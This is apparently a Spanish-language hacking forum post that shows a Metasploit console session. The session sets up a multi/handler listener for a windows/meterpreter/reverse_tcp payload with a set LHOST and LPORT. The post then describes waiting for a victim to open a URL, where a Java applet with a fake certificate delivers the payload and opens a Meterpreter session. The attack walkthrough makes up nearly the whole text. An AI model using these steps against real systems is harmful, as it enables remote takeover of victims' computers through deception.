8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


      =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops

msf exploit(handler) > back
msf > use multi/handler
reverse_tcpmsf exploit(handler) > set PAYLOAD windows/meterpreter/
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.142.136
LHOST => 192.168.142.136
msf exploit(handler) > set LPORT 1234
LPORT => 1234
msf exploit(handler) > save
Saved configuration to: /home/shellroot/.msf3/config
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler...


y esperamos a que alguien ingrese a la URL, para recibir la Session del Meterpreter.

PD: La victima al ejecutar se le mostratá el siguiente certificado Web. :D


Gr3tz: Rcart, Messerschmitt, Xzite






Mirando los tipos de infecciones que se pueden realizar para Inyectar un PAYLOAD, encontré un Papper de AnalyseR, publicado por Hacker_Zero, Mirad. (http://foro.elhacker.net/hacking_avanzado/poc_infeccion_mediante_java_applet_y_vbscript-t240306.0.html). Pero mirando el MSFUnleashed, me di cuenta que era el mismo tipo de infección, Mirad (http://www.offensive-security.com/metasploit-unleashed/Java-Applet-Infection-Method) así que no se quien es... :·P, igual no me importa... x·D